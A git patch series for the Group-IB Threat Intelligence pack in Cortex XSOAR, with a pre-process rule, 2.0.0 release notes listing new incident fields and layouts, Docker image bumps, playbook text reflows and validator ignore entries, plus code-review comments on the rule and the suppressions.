+ "linkTo": "oldest",
+ "locked": false,
+ "name": "gib_rule",
+ "newEventFilters": [
+ [
+ {
+ "left": {
+ "isContext": true,
+ "value": {
+ "simple": "gibid"
+ }
+ },
+ "operator": "isNotEmpty",
+ "right": {
+ "value": {}
+ },
+ "type": "shortText"
+ }
+ ],
+ [
+ {
+ "left": {
+ "isContext": true,
+ "value": {
+ "simple": "type"
+ }
+ },
+ "operator": "isNotEqualString",
+ "right": {
+ "value": {
+ "simple": "GIB Data Breach"
+ }
+ },
+ "type": "singleSelect"
+ }
+ ]
+ ],
+ "packID": "",
+ "period": {
+ "by": "days",
+ "fromValue": 30
+ },
+ "readyNewEventFilters": [
+ [
+ {
+ "left": {
+ "isContext": true,
+ "value": {
+ "simple": "gibid"
+ }
+ },
+ "operator": "isNotEmpty",
+ "right": {
+ "value": {}
+ },
+ "type": "shortText"
+ }
+ ],
+ [
+ {
+ "left": {
+ "isContext": true,
+ "value": {
+ "simple": "type"
+ }
+ },
+ "operator": "isNotEqualString",
+ "right": {
+ "value": {
+ "simple": "GIB Data Breach"
+ }
+ },
+ "type": "singleSelect"
+ }
+ ]
+ ],
+ "scriptName": "",
+ "searchClosed": false,
+ "system": false,
+ "toServerVersion": "",
+ "version": -1,
+ "fromVersion": "6.10.0"
+}
\ No newline at end of file
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/README.md b/Packs/GroupIB_ThreatIntelligenceAttribution/README.md
index 4db1adb74e06..8f54345955e2 100644
--- a/Packs/GroupIB_ThreatIntelligenceAttribution/README.md
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/README.md
@@ -3,6 +3,7 @@ Nowadays businesses in any sphere may have problems with their cybersecurity: fr
 Group-IB Threat Intelligence Pack can help you with managing your incident and indicators from Group-IB within the SOAR system.
 ### What does this pack do?
+
 * Receive incidents and attribute them to adversaries.
 * Enrich security system with IOCs.
 * Provide possibilities for manual investigation through Group-IB data via Cortex XSOAR interface.
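Review bot: The rule is declared with `"action": "script"` but leaves `"scriptName": ""`, so as committed it selects the run-a-script action without naming any script to run, while `"linkTo": "oldest"`, `"period"` and `"searchClosed"` are keys that presumably only matter for a link action — which suggests the intended action was link, not script. Either set `"scriptName"` to the script that should handle incoming incidents that carry a `gibid`, or change `"action"` to the link action and add the match against existing incidents on `gibid`, because the two filters present only test the incoming incident (`gibid` non-empty and `type` not `GIB Data Breach`) and say nothing about which existing incident to link to. The release notes further down this page list this rule as `New: gib_test`, whereas the file's `id` and `name` are both `gib_rule`; one of them should be corrected before release. `"newEventFilters"` and `"readyNewEventFilters"` are byte-identical copies, and a sentence in the pack README on why both are populated would help whoever maintains this rule next.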
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/ReleaseNotes/2_0_0.md b/Packs/GroupIB_ThreatIntelligenceAttribution/ReleaseNotes/2_0_0.md
new file mode 100644
index 000000000000..917ce431a716
--- /dev/null
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/ReleaseNotes/2_0_0.md
@@ -0,0 +1,620 @@ + +#### Classifiers + +##### Group-IB Threat Intelligence (classifier) + +- Added and modified classifications for new collections + +#### Incident Fields + +- Added new incident fields for new and old collections and also changed old incident fields related to old collections + +##### GIB Address + +##### New: GIB Cybercriminal Forums Table + +##### GIB Downloaded From + +##### New: GIB Nation-State Cybercriminals Expertises + +##### New: GIB Merged Cvss + +##### New: GIB Nation-State Cybercriminals Threat Actor Aliases + +##### New: GIB Malware Platforms + +##### New: GIB Leak Published + +##### New: GIB Report Number + +##### New: GIB Provider Domain + +##### New: GIB CPE Table + +##### New: GIB Socks Proxy Source + +##### New: GIB Target Provider + +##### New: GIB Cybercriminal Sectors + +##### New: GIB Nation-State Cybercriminals Regions + +##### New: GIB Nation-State Cybercriminals Threat Title + +##### New: GIB Date Add + +##### GIB Leaked File Name + +##### New: GIB Date First Compromised + +##### New: GIB Compromised Events Information Table + +##### New: GIB Cybercriminal Threat Title + +##### New: GIB Nation-State Cybercriminals Threat Actor Reports Table + +##### New: GIB DDOS Date End + +##### New: GIB Cybercriminal Threat Actor Report Authors + +##### New: GIB Organization IBAN + +##### New: GIB Mirror Link + +##### GIB ID + +##### New: GIB Deface Date + +##### New: GIB DDOS Request Body + +##### GIB Card Number + +##### New: GIB Email Domains + +##### New: GIB DDOS Target City + +##### GIB Phishing Date Blocked + +##### GIB Date of Detection + +##### New: GIB Organization BSB + +##### New: GIB Malware Description + +##### New: GIB Phishing URLs + +##### New: GIB Nation-State Cybercriminals Threat Regions + +##### New: GIB Nation-State Cybercriminals Threat Actor Country + +##### New: GIB Target IP + +##### New: GIB Threat Level + +##### New: GIB Country Name + +##### New: GIB Organization CLABE + +##### New: GIB Date Last 
Compromised + +##### New: GIB Extended CVSS Base + +##### New: GIB Vulnerability Type + +##### New: GIB Proxy Port + +##### New: GIB Date Last Seen + +##### New: GIB Phishing Kit Path + +##### GIB Severity + +##### New: GIB DDOS Target Domain + +##### New: GIB Organization SWIFT + +##### New: GIB Malware Aliases + +##### GIB Drop Email + +##### New: GIB Target ASN + +##### New: GIB Extended CVSS Temporal + +##### New: GIB Downloaded From Table + +##### New: GIB Nation-State Cybercriminals Threat Actor Roles + +##### New: GIB Date Updated At + +##### New: GIB Malware Regions + +##### GIB Drop Email Domain + +##### New: GIB VPN Sources + +##### GIB Malware Name + +##### New: GIB Link List Table + +##### New: CPE Table + +##### GIB Favicon + +##### GIB Person + +##### New: GIB Affected Software Table + +##### New: GIB CVSS Vector + +##### New: GIB Passwords + +##### GIB Date Compromised + +##### GIB Leak Name + +##### New: GIB DDOS Request Headers Body + +##### New: GIB Emails + +##### GIB Compromised Login + +##### GIB Related Indicators Data + +##### New: GIB Organization Name + +##### New: GIB Malware Table + +##### New: GIB DDOS Date Begin + +##### GIB CVV + +##### New: GIB Nation-State Cybercriminals Threat Langs + +##### GIB Admiralty Code + +##### New: GIB DDOS Target URL + +##### New: GIB DDOS Target Provider + +##### New: GIB Proxy Source + +##### New: GIB Extended CVSS Overall + +##### GIB Phishing Type + +##### New: GIB Malware Short Description + +##### New: GIB Nation-State Cybercriminals Threat Description + +##### GIB Email + +##### New: GIB Parsed Login Domain + +##### GIB Inject Dump + +##### New: GIB Cybercriminal Threat Description + +##### New: GIB CNC Port + +##### New: GIB Service IP + +##### GIB Leaked Data + +##### New: GIB Phishing Kit Email + +##### New: GIB Is Tailored + +##### New: GIB Target Domain Provider + +##### New: GIB Extended Description + +##### New: GIB Upload Time + +##### New: GIB Malware File hash + +##### New: GIB 
Nation-State Cybercriminals Threat Actor Labels + +##### New: GIB DDOS Target Country Code + +##### New: GIB Matches Table + +##### New: GIB Phishing IP Table + +##### New: GIB DDOS Request Headers Hash + +##### GIB Password + +##### New: GIB DDOS Protocol + +##### New: GIB DDOS Date Registration + +##### New: GIB Cybercriminal Regions + +##### New: GIB Proxy Type + +##### GIB Phishing Kit Emails + +##### GIB Source + +##### GIB Phishing Status + +##### New: GIB DDOS Target Port + +##### New: GIB Malware Langs + +##### New: GIB Service URL + +##### New: GIB Nation-State Cybercriminals Threat Expertises + +##### New: GIB Deface Source + +##### New: GIB Nation-State Cybercriminals Malware + +##### GIB Name Servers + +##### New: GIB Country Code + +##### New: GIB Bulletin Family + +##### New: GIB Deface Site URL + +##### New: GIB Has Exploit + +##### GIB Reliability + +##### New: GIB Nation-State Cybercriminals Threat Actor Description + +##### New: GIB Target Region + +##### New: GIB Phishing Domain Puny + +##### New: GIB Nation-State Cybercriminals Threat Report Number + +##### New: GIB Phishing Objectives + +##### New: GIB Phishing Sources + +##### New: GIB Date Modified + +##### New: GIB DDOS Target Category + +##### New: GIB Cybercriminal Threat Actor Aliases + +##### New: GIB Service Domain + +##### GIB Title + +##### New: GIB Phishing Registrar + +##### GIB Card Issuer + +##### New: GIB Cybercriminal Expertises + +##### New: GIB Nation-State Cybercriminals Sectors + +##### New: GIB GIT Source + +##### GIB Threat Actor is APT + +##### New: GIB DDOS Target IP + +##### New: GIB Nation-State Cybercriminals Threat Actor CVE + +##### New: GIB DDOS Request Body Hash + +##### New: GIB CNC URL + +##### New: GIB Compromised Events Table + +##### New: GIB Extended CVSS Exploitability + +##### New: GIB Threat Actors Table + +##### New: GIB Nation-State Cybercriminals Threat Sectors + +##### New: GIB Organization BIC + +##### GIB Inject MD5 + +##### New: GIB Target City + 
+##### New: GIB DDOS Type + +##### GIB Date Created + +##### New: GIB Phishing Date Updated + +##### New: GIB Date First Seen + +##### New: GIB Date Published + +##### New: GIB Malware Categories + +##### New: GIB DDOS Target Region + +##### New: GIB DDOS Source + +##### New: GIB VPN Names + +##### New: GIB Cybercriminal Malware + +##### New: GIB Extended CVSS Impact + +##### GIB Payment System + +##### New: GIB Phishing Domain Expiration Date + +##### GIB Victim IP + +##### GIB Repository + +##### New: GIB DDOS Duration + +##### New: GIB DDOS Target Country Name + +##### New: GIB Phishing Kit Table + +##### New: GIB Reporter + +##### GIB Phishing Kit Hash + +##### New: GIB Date Created At + +##### New: GIB Phishing Kit Source + +##### New: GIB Nation-State Cybercriminal Forums Table + +##### GIB Threat Actor ID + +##### GIB Credibility + +##### New: GIB Nation-State Cybercriminals Threat Countries + +##### New: GIB Cybercriminal Threat Actor Description + +##### New: GIB Parsed Login IP + +##### New: GIB Phishing Date Detected + +##### GIB Card Type + +##### GIB Threat Actor Name + +##### GIB Target Brand + +##### New: GIB Deface Contacts + +##### New: GIB Proxy Sources + +##### New: GIB Phishing Brand + +##### New: GIB Threat Actor Country + +##### New: GIB Scanner Categories + +##### New: GIB Nation-State Cybercriminals Threat Actor Goals + +##### New: GIB Cybercriminal Threat Actor Reports Table + +##### New: GIB Malware CNC Domain + +##### GIB HTML + +##### New: GIB CNC + +##### New: GIB DDOS Target ASN + +##### GIB Screenshot + +##### GIB Phishing Domain + +##### New: GIB Href + +##### New: GIB OSI Git Repository Files Table + +##### New: GIB Malware Source Countries + +##### GIB Card Valid Thru + +##### New: GIB Scanner Sources + +##### New: GIB Phishing Date Added + +##### GIB Target Category + +##### New: GIB CVSS Score + +##### GIB Date Expired + +##### New: GIB Compromised Account + +##### New: GIB DDOS Request Data Link + +##### New: GIB CNC Domain + 
+##### New: GIB Date Incident + +##### GIB Portal Link + +##### GIB Target Domain + +##### New: GIB Update Time + +##### GIB Data Hash + + +#### Incident Types + +- Added new incident types for new and old collections and also changed old incident types related to old collections + +##### New: GIB Nation-State Cybercriminals Threat Actor + +##### New: GIB Suspicious IP Scanner + +##### New: GIB Suspicious IP Socks Proxy + +##### New: GIB Compromised Card Group + +##### New: GIB Suspicious IP TOR Node + +##### New: GIB Attacks DDOS + +##### New: GIB Attacks Phishing Kit + +##### New: GIB Compromised Account Group + +##### GIB Compromised Card + +##### New: GIB OSI Vulnerability + +##### GIB OSI Public Leak + +##### New: GIB Nation-State Cybercriminals Threat + +##### GIB Brand Protection Phishing + +##### GIB Targeted Malware + +##### New: GIB Malware CNC + +##### New: GIB Cybercriminal Threat + +##### GIB Compromised Account + +##### New: GIB Malware + +##### GIB OSI Git Leak + +##### New: GIB Suspicious IP Open Proxy + +##### New: GIB Cybercriminal Threat Actor + +##### New: GIB Suspicious IP VPN + +##### New: GIB APT Threat + +##### New: GIB Compromised Mule + +##### GIB Data Breach + +##### GIB Brand Protection Phishing Kit + +##### New: GIB Attacks Deface + +##### New: GIB Attacks Phishing Group + + +#### Indicator Fields + +- Added new indicator fields for new and old collections and also changed old indicator fields related to old collections + +##### GIB Malware Name + +##### GIB Severity + +##### GIB Reliability + +##### GIB Threat Actor is APT + +##### GIB Admiralty Code + +##### GIB Credibility + +##### New: GIB Hash + +##### GIB ID + +##### GIB Threat Actor Name + +##### GIB Threat Actor ID + +##### GIB Collection + + +#### Integrations + +##### Group-IB Threat Intelligence + +- Updated the Docker image to: *demisto/vendors-sdk:1.0.0.106889*. 
+- Completely updated the code, the main work with API is rewritten to use the library + +##### Group-IB Threat Intelligence Feed + +- Updated the Docker image to: *demisto/vendors-sdk:1.0.0.106889*. +- Completely updated the code, the main work with API is rewritten to use the library + +#### Layouts + +- New layouts for new collections have been added, as well as old layouts have been modified + +##### New: GIB Attacks Phishing Group Layout + +##### GIB Compromised Card Layout + +##### New: GIB Compromised Account Group Layout + +##### GIB Targeted Malware Layout + +##### New: GIB Suspicious IP Scanner Layout + +##### GIB Compromised Account Layout + +##### New: GIB Attacks Deface Layout + +##### New: GIB Cybercriminal Threat Actor Layout + +##### New: GIB Suspicious IP Open Proxy Layout + +##### New: GIB Malware CNC Layout + +##### GIB OSI Public Leak Layout + +##### New: GIB Compromised Card Group Layout + +##### New: GIB Nation-State Cybercriminals Threat Layout + +##### New: GIB OSI Vulnerability Layout + +##### New: GIB Attacks Phishing Kit Layout + +##### GIB Victim IP Layout + +##### GIB Data Breach Layout + +##### New: GIB Cybercriminal Threat Layout + +##### GIB Brand Protection Phishing Kit Layout + +##### New: GIB APT Threat Layout + +##### New: GIB Nation-State Cybercriminals Threat Actor Layout + +##### New: GIB Attacks DDOS Layout + +##### GIB Brand Protection Phishing Layout + +##### New: GIB Suspicious IP Socks Proxy Layout + +##### GIB Compromised IMEI Layout + +##### GIB Compromised Mule Layout + +##### GIB OSI Git Leak Layout + +##### New: GIB Malware Layout + +##### New: GIB Suspicious IP VPN Layout + +##### New: GIB Suspicious IP TOR Node Layout + + +#### Mappers + +##### Group-IB Threat Intelligence (mapper) + +- Added under new collections and edited under old collections + +#### PreProcess Rules + +##### New: gib_test 
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/Scripts/GIBIncidentUpdate/GIBIncidentUpdate.yml b/Packs/GroupIB_ThreatIntelligenceAttribution/Scripts/GIBIncidentUpdate/GIBIncidentUpdate.yml index 893a13b788f9..01f66d1cebc7 100644 --- a/Packs/GroupIB_ThreatIntelligenceAttribution/Scripts/GIBIncidentUpdate/GIBIncidentUpdate.yml +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/Scripts/GIBIncidentUpdate/GIBIncidentUpdate.yml @@ -9,7 +9,7 @@ comment: |- commonfields: id: GIBIncidentUpdate version: -1 -dockerimage: demisto/python3:3.11.10.116949 +dockerimage: demisto/python3:3.12.8.1983910 enabled: true name: GIBIncidentUpdate script: '' diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/Scripts/GIBIncidentUpdate/README.md b/Packs/GroupIB_ThreatIntelligenceAttribution/Scripts/GIBIncidentUpdate/README.md index d831c388ccef..77241cc2324a 100644 --- a/Packs/GroupIB_ThreatIntelligenceAttribution/Scripts/GIBIncidentUpdate/README.md +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/Scripts/GIBIncidentUpdate/README.md @@ -1,12 +1,14 @@ This script prevents duplication of existing incidents. ## Permissions + --- This automation runs using the default Limited User role, unless you explicitly change the permissions. -For more information, see the section about permissions here: For Cortex XSOAR 6, see the https://docs-cortex.paloaltonetworks.com/r/Cortex-XSOAR/6.x/Cortex-XSOAR-Playbook-Design-Guide/Automations for Cortex XSOAR 8 Cloud, see the https://docs-cortex.paloaltonetworks.com/r/Cortex-XSOAR/8/Cortex-XSOAR-Cloud-Documentation/Create-a-script for Cortex XSOAR 8 On-prem, see the https://docs-cortex.paloaltonetworks.com/r/Cortex-XSOAR/8.7/Cortex-XSOAR-On-prem-Documentation/Create-a-script. +For more information, see the section about permissions here: For Cortex XSOAR 6, see the for Cortex XSOAR 8 Cloud, see the for Cortex XSOAR 8 On-prem, see the . ## Script Data + --- | **Name** | **Description** | 
@@ -16,9 +18,11 @@ For more information, see the section about permissions here: For Cortex XSOAR 6 | Cortex XSOAR Version | 6.0.0 | ## Inputs + --- There are no inputs for this script. ## Outputs + --- There are no outputs for this script. diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/Scripts/GIBIncidentUpdateIncludingClosed/GIBIncidentUpdateIncludingClosed.yml b/Packs/GroupIB_ThreatIntelligenceAttribution/Scripts/GIBIncidentUpdateIncludingClosed/GIBIncidentUpdateIncludingClosed.yml index 1bb25c257407..e7eefbce785d 100644 --- a/Packs/GroupIB_ThreatIntelligenceAttribution/Scripts/GIBIncidentUpdateIncludingClosed/GIBIncidentUpdateIncludingClosed.yml +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/Scripts/GIBIncidentUpdateIncludingClosed/GIBIncidentUpdateIncludingClosed.yml @@ -9,7 +9,7 @@ comment: |- commonfields: id: GIBIncidentUpdateIncludingClosed version: -1 -dockerimage: demisto/python3:3.11.10.116949 +dockerimage: demisto/python3:3.12.8.1983910 enabled: true name: GIBIncidentUpdateIncludingClosed script: '' diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/Scripts/GIBIncidentUpdateIncludingClosed/README.md b/Packs/GroupIB_ThreatIntelligenceAttribution/Scripts/GIBIncidentUpdateIncludingClosed/README.md index d831c388ccef..77241cc2324a 100644 --- a/Packs/GroupIB_ThreatIntelligenceAttribution/Scripts/GIBIncidentUpdateIncludingClosed/README.md +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/Scripts/GIBIncidentUpdateIncludingClosed/README.md 
@@ -1,12 +1,14 @@ This script prevents duplication of existing incidents. ## Permissions + --- This automation runs using the default Limited User role, unless you explicitly change the permissions. -For more information, see the section about permissions here: For Cortex XSOAR 6, see the https://docs-cortex.paloaltonetworks.com/r/Cortex-XSOAR/6.x/Cortex-XSOAR-Playbook-Design-Guide/Automations for Cortex XSOAR 8 Cloud, see the https://docs-cortex.paloaltonetworks.com/r/Cortex-XSOAR/8/Cortex-XSOAR-Cloud-Documentation/Create-a-script for Cortex XSOAR 8 On-prem, see the https://docs-cortex.paloaltonetworks.com/r/Cortex-XSOAR/8.7/Cortex-XSOAR-On-prem-Documentation/Create-a-script. +For more information, see the section about permissions here: For Cortex XSOAR 6, see the for Cortex XSOAR 8 Cloud, see the for Cortex XSOAR 8 On-prem, see the . ## Script Data + --- | **Name** | **Description** | @@ -16,9 +18,11 @@ For more information, see the section about permissions here: For Cortex XSOAR 6 | Cortex XSOAR Version | 6.0.0 | ## Inputs + --- There are no inputs for this script. ## Outputs + --- There are no outputs for this script. diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/TestPlaybooks/Group-IB_Threat_Intelligence_&_Attribution-Test.yml b/Packs/GroupIB_ThreatIntelligenceAttribution/TestPlaybooks/Group-IB_Threat_Intelligence_&_Attribution-Test.yml index 502b1f5a2398..d084123871ad 100644 --- a/Packs/GroupIB_ThreatIntelligenceAttribution/TestPlaybooks/Group-IB_Threat_Intelligence_&_Attribution-Test.yml +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/TestPlaybooks/Group-IB_Threat_Intelligence_&_Attribution-Test.yml @@ -20,6 +20,7 @@ tasks: iscommand: false name: "" version: -1 + description: '' taskid: 631167a0-5f24-43e6-8a44-9860568c5711 timertriggers: [] type: start 
@@ -110,8 +111,7 @@ tasks: skipunavailable: false task: brand: Group-IB Threat Intelligence & Attribution - description: Command performs Group IB event lookup in compromised/imei collection - with provided ID. + description: Command performs Group IB event lookup in compromised/imei collection with provided ID. id: d48cf365-e7b0-4ad7-82d8-782747c49da6 iscommand: true name: gibtia-get-compromised-imei-info @@ -143,8 +143,7 @@ tasks: skipunavailable: false task: brand: Group-IB Threat Intelligence & Attribution - description: Command performs Group IB event lookup in compromised/mule collection - with provided ID. + description: Command performs Group IB event lookup in compromised/mule collection with provided ID. id: c0f7f60e-df38-4279-8962-a776b7acc0f9 iscommand: true name: gibtia-get-compromised-mule-info @@ -176,8 +175,7 @@ tasks: skipunavailable: false task: brand: Group-IB Threat Intelligence & Attribution - description: Command performs Group IB event lookup in attacks/ddos collection - with provided ID. + description: Command performs Group IB event lookup in attacks/ddos collection with provided ID. id: 8a87b580-33e0-41ff-88ff-901d8cf7291c iscommand: true name: gibtia-get-attacks-ddos-info @@ -209,8 +207,7 @@ tasks: skipunavailable: false task: brand: Group-IB Threat Intelligence & Attribution - description: Command performs Group IB event lookup in attacks/deface collection - with provided ID. + description: Command performs Group IB event lookup in attacks/deface collection with provided ID. id: 3ec6978b-6346-4b2c-8612-79070afce502 iscommand: true name: gibtia-get-attacks-deface-info 
@@ -242,8 +239,7 @@ tasks: skipunavailable: false task: brand: Group-IB Threat Intelligence & Attribution - description: Command performs Group IB event lookup in bp/phishing and attacks/phishing - collections with provided ID. + description: Command performs Group IB event lookup in bp/phishing and attacks/phishing collections with provided ID. id: 1599062a-59a1-4fc8-8813-e6eb7e22a3fd iscommand: true name: gibtia-get-phishing-info @@ -275,8 +271,7 @@ tasks: skipunavailable: false task: brand: Group-IB Threat Intelligence & Attribution - description: Command performs Group IB event lookup in bp/phishing_kit and attacks/phishing_kit - collections with provided ID. + description: Command performs Group IB event lookup in bp/phishing_kit and attacks/phishing_kit collections with provided ID. id: 724bd9b1-9dae-4775-8ee4-1df068d6fbb6 iscommand: true name: gibtia-get-phishing-kit-info @@ -310,8 +305,7 @@ tasks: skipunavailable: false task: brand: Group-IB Threat Intelligence & Attribution - description: Command performs Group IB event lookup in hi/threat (or in apt/threat - if the APT flag is true) collection with provided ID. + description: Command performs Group IB event lookup in hi/threat (or in apt/threat if the APT flag is true) collection with provided ID. id: eae8cd79-0648-40d4-8148-036d84f9ec45 iscommand: true name: gibtia-get-threat-info @@ -344,8 +338,7 @@ tasks: skipunavailable: false task: brand: Group-IB Threat Intelligence & Attribution - description: Command performs Group IB event lookup in hi/threat_actor (or in - apt/threat_actor if the APT flag is true) collection with provided ID. + description: Command performs Group IB event lookup in hi/threat_actor (or in apt/threat_actor if the APT flag is true) collection with provided ID. id: 0e714742-8a8e-4e2f-8095-dae0748e3890 iscommand: true name: gibtia-get-threat-actor-info 
@@ -377,8 +370,7 @@ tasks: skipunavailable: false task: brand: Group-IB Threat Intelligence & Attribution - description: Command performs Group IB event lookup in suspicious_ip/open_proxy - collection with provided ID. + description: Command performs Group IB event lookup in suspicious_ip/open_proxy collection with provided ID. id: 98e99b45-424a-4ae0-837c-db1f6dd6d4f0 iscommand: true name: gibtia-get-suspicious-ip-open-proxy-info @@ -410,8 +402,7 @@ tasks: skipunavailable: false task: brand: Group-IB Threat Intelligence & Attribution - description: Command performs Group IB event lookup in suspicious_ip/socks_proxy - collection with provided ID. + description: Command performs Group IB event lookup in suspicious_ip/socks_proxy collection with provided ID. id: af6be76b-bb06-44b7-894e-74d0113fa744 iscommand: true name: gibtia-get-suspicious-ip-socks-proxy-info @@ -443,8 +434,7 @@ tasks: skipunavailable: false task: brand: Group-IB Threat Intelligence & Attribution - description: Command performs Group IB event lookup in suspicious_ip/tor_node - collection with provided ID. + description: Command performs Group IB event lookup in suspicious_ip/tor_node collection with provided ID. id: 593ee8bc-3791-4a57-8170-9c69fe966e28 iscommand: true name: gibtia-get-suspicious-ip-tor-node-info @@ -476,8 +466,7 @@ tasks: skipunavailable: false task: brand: Group-IB Threat Intelligence & Attribution - description: Command performs Group IB event lookup in osi/vulnerability collection - with provided ID. + description: Command performs Group IB event lookup in osi/vulnerability collection with provided ID. id: 42c3d3b3-c343-478f-8b62-e298df041864 iscommand: true name: gibtia-get-osi-vulnerability-info 
@@ -509,8 +498,7 @@ tasks: skipunavailable: false task: brand: Group-IB Threat Intelligence & Attribution - description: Command performs Group IB event lookup in malware/cnc collection - by provided ID. + description: Command performs Group IB event lookup in malware/cnc collection by provided ID. id: bffdb353-f903-4e5a-8a8a-1206a8b08230 iscommand: true name: gibtia-get-malware-cnc-info @@ -625,6 +613,7 @@ tasks: name: Done type: title version: -1 + description: '' taskid: 5a806a99-0da7-4bb9-8507-1c9851220a7e timertriggers: [] type: title @@ -1250,8 +1239,7 @@ tasks: skipunavailable: false task: brand: "" - description: Checks that suspicious_ip/tor_node collection available for the - client. + description: Checks that suspicious_ip/tor_node collection available for the client. id: 83e372d2-713d-428e-8663-83d71df66f5e iscommand: false name: Is suspicious_ip/tor_node collection available? @@ -1335,8 +1323,7 @@ tasks: skipunavailable: false task: brand: "" - description: Checks that suspicious_ip/open_proxy collection available for the - client. + description: Checks that suspicious_ip/open_proxy collection available for the client. id: e9229b64-131e-4835-8ab7-bd65180cc255 iscommand: false name: Is suspicious_ip/open_proxy collection available? @@ -1420,8 +1407,7 @@ tasks: skipunavailable: false task: brand: "" - description: Checks that suspicious_ip/socks_proxy collection available for - the client. + description: Checks that suspicious_ip/socks_proxy collection available for the client. id: c241afe9-a4ea-4ca6-898f-bca3b504a9be iscommand: false name: Is suspicious_ip/socks_proxy collection available? diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/pack_metadata.json b/Packs/GroupIB_ThreatIntelligenceAttribution/pack_metadata.json index 25bff104cd65..1e6119710590 100644 --- a/Packs/GroupIB_ThreatIntelligenceAttribution/pack_metadata.json +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/pack_metadata.json 
@@ -2,7 +2,7 @@
 "name": "Group-IB Threat Intelligence",
 "description": "Group-IB Threat Intelligence is a system for analyzing and attributing cyberattacks, threat hunting, and protecting network infrastructure based on data relating to adversary tactics, tools, and activity. Use this pack to fast receive incidents related to you, attribute them to adversaries to do instant response, enrich your security with an enormous IOCs collection, and provide possibilities for manual investigation through Group-IB data via Cortex XSOAR interface.",
 "support": "partner",
- "currentVersion": "1.4.8",
+ "currentVersion": "2.0.0",
 "author": "Group-IB",
 "url": "https://www.group-ib.com/",
 "email": "integration@group-ib.com",
From 2a9d29d39baecacc48f9c294bba0168864e49e9d Mon Sep 17 00:00:00 2001
From: Amichai
Date: Thu, 30 Jan 2025 11:36:06 +0200
Subject: [PATCH 2/9] Skip certain validations

---
 .../.pack-ignore | 279 +++++++++++++++++-
 1 file changed, 276 insertions(+), 3 deletions(-)

diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/.pack-ignore b/Packs/GroupIB_ThreatIntelligenceAttribution/.pack-ignore
index 09370649b2ec..82b60a088577 100644
--- a/Packs/GroupIB_ThreatIntelligenceAttribution/.pack-ignore
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/.pack-ignore
@@ -1,12 +1,15 @@
 [file:GroupIB_TIA.yml]
-ignore=BA108,BA109
+ignore=BA108,BA109,BC104,BC102,ST111,RM110
 
 [file:GroupIB_TIA_Feed.yml]
-ignore=BA108,BA109
+ignore=BA108,BA109,IN163,ST111
 
 [file:classifier-Group-IB_Threat_Intelligence_&_Attribution_(mapper).json]
 ignore=BA101
 
+[file:classifier-Group-IB_Threat_Intelligence_mapper.json]
+ignore=BC113
+
 [file:GroupIBTIA_image.png]
 ignore=IM111
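Review bot: The new `ignore=BA108,BA109,BC104,BC102,ST111,RM110` entry for GroupIB_TIA.yml silences backward-compatibility validators (the BC-prefixed codes) in the same series that bumps the pack to 2.0.0, and nothing in the hunk records why each code is safe to skip. If commands or arguments were removed or renamed in the rewrite, that belongs in the 2.0.0 release notes as a migration note for playbooks that still call the old names, not only in the ignore list. Patch 3/9 later narrows the GroupIB_TIA_Feed.yml entry back to `ignore=BA108,BA109` and drops the BC113 entry for the mapper, which suggests the first pass was speculative; the remaining codes for GroupIB_TIA.yml deserve the same second look. If the loader accepts comment lines, a `# reason: <what changed>` line above each suppression would keep the justification next to it.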
@@ -17,4 +20,274 @@ ignore=IM111 ignore=BA101 [file:1_4_1.md] -ignore=RN116 \ No newline at end of file +ignore=RN116 + +[file:incidentfield-GIB_Nation-State_Cybercriminals_Threat_Actor_Country.json] +ignore=IF115 + +[file:incidentfield-GIB_Phishing_URLs.json] +ignore=IF115 + +[file:incidentfield-GIB_Nation-State_Cybercriminals_Sectors.json] +ignore=IF115 + +[file:incidentfield-GIB_Malware_CNC_Domain.json] +ignore=IF115 + +[file:incidentfield-GIB_DDOS_Date_Registration.json] +ignore=IF115 + +[file:incidentfield-GIB_CVSS_Vector.json] +ignore=IF115 + +[file:incidentfield-GIB_Threat_Actors_Table.json] +ignore=IF115 + +[file:incidentfield-GIB_Extended_CVSS_Exploitability.json] +ignore=IF115 + +[file:incidentfield-GIB_DDOS_Request_Data_Link.json] +ignore=IF115 + +[file:incidentfield-GIB_Cybercriminal_Threat_Actor_Description.json] +ignore=IF115 + +[file:incidentfield-GIB_CPE_Table.json] +ignore=IF115 + +[file:incidentfield-GIB_Cybercriminal_Expertises.json] +ignore=IF115 + +[file:incidentfield-GIB_Link_List_Table.json] +ignore=IF115 + +[file:incidentfield-GIB_DDOS_Duration.json] +ignore=IF115 + +[file:incidentfield-GIB_Organization_BIC.json] +ignore=IF115 + +[file:incidentfield-GIB_Proxy_Source.json] +ignore=IF115 + +[file:incidentfield-GIB_Leak_Published.json] +ignore=IF115 + +[file:incidentfield-GIB_Organization_IBAN.json] +ignore=IF115 + +[file:incidentfield-GIB_Matches_Table.json] +ignore=IF115 + +[file:incidentfield-GIB_OSI_Git_Repository_Files_Table.json] +ignore=IF115 + +[file:incidentfield-GIB_Scanner_Categories.json] +ignore=IF115 + +[file:incidentfield-GIB_Merged_Cvss.json] +ignore=IF115 + +[file:incidentfield-GIB_Phishing_Registrar.json] +ignore=IF115 + +[file:incidentfield-GIB_Organization_Name.json] +ignore=IF115 + +[file:incidentfield-GIB_Parsed_Login_Domain.json] +ignore=IF115 + +[file:incidentfield-GIB_DDOS_Target_Provider.json] +ignore=IF115 + +[file:incidentfield-GIB_Proxy_Type.json] +ignore=IF115 + +[file:incidentfield-GIB_Malware_Langs.json] 
